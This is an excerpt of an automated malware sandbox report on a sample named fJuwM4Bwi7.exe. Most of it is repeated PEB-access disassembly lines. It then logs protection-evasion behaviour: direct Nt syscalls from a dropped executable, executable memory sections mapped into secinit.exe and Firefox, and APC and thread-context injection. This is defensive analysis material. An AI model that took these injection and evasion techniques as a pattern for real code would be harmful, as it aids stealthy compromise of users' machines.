        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E50B7 mov eax, dword ptr fs:[00000030h]8_2_329E50B7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329500A5 mov eax, dword ptr fs:[00000030h]8_2_329500A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CB0AF mov eax, dword ptr fs:[00000030h]8_2_329CB0AF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292B0D0 mov eax, dword ptr fs:[00000030h]8_2_3292B0D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B0D6 mov eax, dword ptr fs:[00000030h]8_2_3290B0D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B0D6 mov eax, dword ptr fs:[00000030h]8_2_3290B0D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B0D6 mov eax, dword ptr fs:[00000030h]8_2_3290B0D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B0D6 mov eax, dword ptr fs:[00000030h]8_2_3290B0D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294D0F0 mov eax, dword ptr fs:[00000030h]8_2_3294D0F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294D0F0 mov ecx, dword ptr fs:[00000030h]8_2_3294D0F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290C0F6 mov eax, dword ptr fs:[00000030h]8_2_3290C0F6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329090F8 mov eax, dword ptr fs:[00000030h]8_2_329090F8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329090F8 mov eax, dword ptr fs:[00000030h]8_2_329090F8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329090F8 mov eax, dword ptr fs:[00000030h]8_2_329090F8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329090F8 mov eax, dword ptr fs:[00000030h]8_2_329090F8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32935004 mov eax, dword ptr fs:[00000030h]8_2_32935004
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32935004 mov ecx, dword ptr fs:[00000030h]8_2_32935004
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32918009 mov eax, dword ptr fs:[00000030h]8_2_32918009
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290D02D mov eax, dword ptr fs:[00000030h]8_2_3290D02D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911051 mov eax, dword ptr fs:[00000030h]8_2_32911051
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911051 mov eax, dword ptr fs:[00000030h]8_2_32911051
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E505B mov eax, dword ptr fs:[00000030h]8_2_329E505B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32940044 mov eax, dword ptr fs:[00000030h]8_2_32940044
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32917072 mov eax, dword ptr fs:[00000030h]8_2_32917072
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32916074 mov eax, dword ptr fs:[00000030h]8_2_32916074
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32916074 mov eax, dword ptr fs:[00000030h]8_2_32916074
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329B9060 mov eax, dword ptr fs:[00000030h]8_2_329B9060
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951190 mov eax, dword ptr fs:[00000030h]8_2_32951190
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951190 mov eax, dword ptr fs:[00000030h]8_2_32951190
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32939194 mov eax, dword ptr fs:[00000030h]8_2_32939194
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32914180 mov eax, dword ptr fs:[00000030h]8_2_32914180
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32914180 mov eax, dword ptr fs:[00000030h]8_2_32914180
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32914180 mov eax, dword ptr fs:[00000030h]8_2_32914180
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E51B6 mov eax, dword ptr fs:[00000030h]8_2_329E51B6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329431BE mov eax, dword ptr fs:[00000030h]8_2_329431BE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329431BE mov eax, dword ptr fs:[00000030h]8_2_329431BE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329441BB mov ecx, dword ptr fs:[00000030h]8_2_329441BB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329441BB mov eax, dword ptr fs:[00000030h]8_2_329441BB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329441BB mov eax, dword ptr fs:[00000030h]8_2_329441BB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E1A4 mov eax, dword ptr fs:[00000030h]8_2_3294E1A4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E1A4 mov eax, dword ptr fs:[00000030h]8_2_3294E1A4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201C0 mov eax, dword ptr fs:[00000030h]8_2_329201C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201C0 mov eax, dword ptr fs:[00000030h]8_2_329201C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C0 mov eax, dword ptr fs:[00000030h]8_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C0 mov eax, dword ptr fs:[00000030h]8_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C0 mov eax, dword ptr fs:[00000030h]8_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C0 mov eax, dword ptr fs:[00000030h]8_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329091F0 mov eax, dword ptr fs:[00000030h]8_2_329091F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329091F0 mov eax, dword ptr fs:[00000030h]8_2_329091F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201F1 mov eax, dword ptr fs:[00000030h]8_2_329201F1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201F1 mov eax, dword ptr fs:[00000030h]8_2_329201F1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201F1 mov eax, dword ptr fs:[00000030h]8_2_329201F1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F1F0 mov eax, dword ptr fs:[00000030h]8_2_3293F1F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F1F0 mov eax, dword ptr fs:[00000030h]8_2_3293F1F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D81EE mov eax, dword ptr fs:[00000030h]8_2_329D81EE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D81EE mov eax, dword ptr fs:[00000030h]8_2_329D81EE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329191E5 mov eax, dword ptr fs:[00000030h]8_2_329191E5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329191E5 mov eax, dword ptr fs:[00000030h]8_2_329191E5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329081EB mov eax, dword ptr fs:[00000030h]8_2_329081EB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32940118 mov eax, dword ptr fs:[00000030h]8_2_32940118
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291510D mov eax, dword ptr fs:[00000030h]8_2_3291510D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF13E mov eax, dword ptr fs:[00000030h]8_2_329CF13E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32947128 mov eax, dword ptr fs:[00000030h]8_2_32947128
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32947128 mov eax, dword ptr fs:[00000030h]8_2_32947128
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E3157 mov eax, dword ptr fs:[00000030h]8_2_329E3157
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E3157 mov eax, dword ptr fs:[00000030h]8_2_329E3157
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E3157 mov eax, dword ptr fs:[00000030h]8_2_329E3157
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294415F mov eax, dword ptr fs:[00000030h]8_2_3294415F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A314A mov eax, dword ptr fs:[00000030h]8_2_329A314A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A314A mov eax, dword ptr fs:[00000030h]8_2_329A314A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A314A mov eax, dword ptr fs:[00000030h]8_2_329A314A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A314A mov eax, dword ptr fs:[00000030h]8_2_329A314A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E5149 mov eax, dword ptr fs:[00000030h]8_2_329E5149
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A147 mov eax, dword ptr fs:[00000030h]8_2_3290A147
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A147 mov eax, dword ptr fs:[00000030h]8_2_3290A147
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A147 mov eax, dword ptr fs:[00000030h]8_2_3290A147
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32916179 mov eax, dword ptr fs:[00000030h]8_2_32916179
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3296717A mov eax, dword ptr fs:[00000030h]8_2_3296717A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3296717A mov eax, dword ptr fs:[00000030h]8_2_3296717A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32918690 mov eax, dword ptr fs:[00000030h]8_2_32918690
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299C691 mov eax, dword ptr fs:[00000030h]8_2_3299C691
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF68C mov eax, dword ptr fs:[00000030h]8_2_329CF68C
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32920680 mov eax, dword ptr fs:[00000030h]8_2_32920680

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtSetInformationProcess: Direct from: 0x77972B7C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtWriteVirtualMemory: Direct from: 0x77972D5C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtMapViewOfSection: Direct from: 0x77972C3C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtNotifyChangeKey: Direct from: 0x77973B4C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtReadVirtualMemory: Direct from: 0x77972DAC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtSetInformationThread: Direct from: 0x77966319
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtOpenKeyEx: Direct from: 0x77973BBC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtQueryInformationToken: Direct from: 0x77972BCC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtProtectVirtualMemory: Direct from: 0x77967A4E
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtOpenFile: Direct from: 0x77972CEC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtQueryVolumeInformationFile: Direct from: 0x77972E4C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtDeviceIoControlFile: Direct from: 0x77972A0C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtQueryValueKey: Direct from: 0x77972B0C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtOpenSection: Direct from: 0x77972D2C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtCreateFile: Direct from: 0x77972F0C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtSetInformationThread: Direct from: 0x77972A6C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtQueryAttributesFile: Direct from: 0x77972D8C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtClose: Direct from: 0x77972A8C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtCreateKey: Direct from: 0x77972B8C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtQuerySystemInformation: Direct from: 0x779747EC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtWriteVirtualMemory: Direct from: 0x7797482C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtProtectVirtualMemory: Direct from: 0x77972EBC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtQueryInformationProcess: Direct from: 0x77972B46
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtResumeThread: Direct from: 0x77972EDC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtCreateUserProcess: Direct from: 0x7797363C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtAllocateVirtualMemory: Direct from: 0x7797480C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtOpenKeyEx: Direct from: 0x77972ABC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtDelayExecution: Direct from: 0x77972CFC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtReadFile: Direct from: 0x779729FC
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtQuerySystemInformation: Direct from: 0x77972D1C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtAllocateVirtualMemory: Direct from: 0x77972B1C
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | NtResumeThread: Direct from: 0x779735CC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: NULL target: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: NULL target: C:\Windows\SysWOW64\secinit.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: NULL target: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe protection: read write
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: NULL target: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\secinit.exe | Thread register set: target process: 9140
        Source: C:\Windows\SysWOW64\secinit.exe | Thread APC queued: target process: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Process created: C:\Users\user\Desktop\fJuwM4Bwi7.exe "C:\Users\user\Desktop\fJuwM4Bwi7.exe"
